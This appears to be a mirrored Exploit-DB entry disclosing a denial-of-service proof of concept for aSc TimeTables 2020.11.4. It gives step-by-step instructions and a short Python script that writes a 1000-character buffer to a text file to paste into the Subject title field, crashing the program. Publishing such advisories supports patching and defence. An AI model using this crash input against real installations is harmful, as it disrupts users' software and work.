aSc TimeTables 2020.11.4 - Denial of Service (PoC)

vendor:

aSc TimeTables 2020.11.4

by:

Ismael Nava

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: aSc TimeTables 2020.11.4

Affected Version From: 2020.11.4

Affected Version To: 2020.11.4

Patch Exists: YES

Related CWE: n/a

CPE: a:asctimetables:asctimetables:2020.11.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Home x64

2020

aSc TimeTables 2020.11.4 – Denial of Service (PoC)

This exploit allows an attacker to cause a denial of service (DoS) by creating a new .txt file with a buffer of 1000 'Z' characters and then copying the content of the file into the Subject title field of the program aSc Timetables 2020.

Mitigation:

The user should ensure that the program is updated to the latest version and should not open any suspicious files.

Source

Exploit-DB raw data:

# Exploit Title: aSc TimeTables 2020.11.4 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.asctimetables.com/#!/home
# Software Link: https://www.asctimetables.com/#!/home/download
# Version: 2020.11.4
# Tested on: Windows 10 Home x64
# CVE : n/a

# STEPS
# Open the program aSc Timetables 2020
# In File select the option New
# Put any letter in the fiel Name of the Schooland click Next
# In the next Windows click NEXT
# In the Step 3, in Subject click in New 
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Tables.txt"
# Paste the content in the field Subject title
# Click in OK
# End :)


buffer = 'Z' * 1000

try: 
    file = open("Tables.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")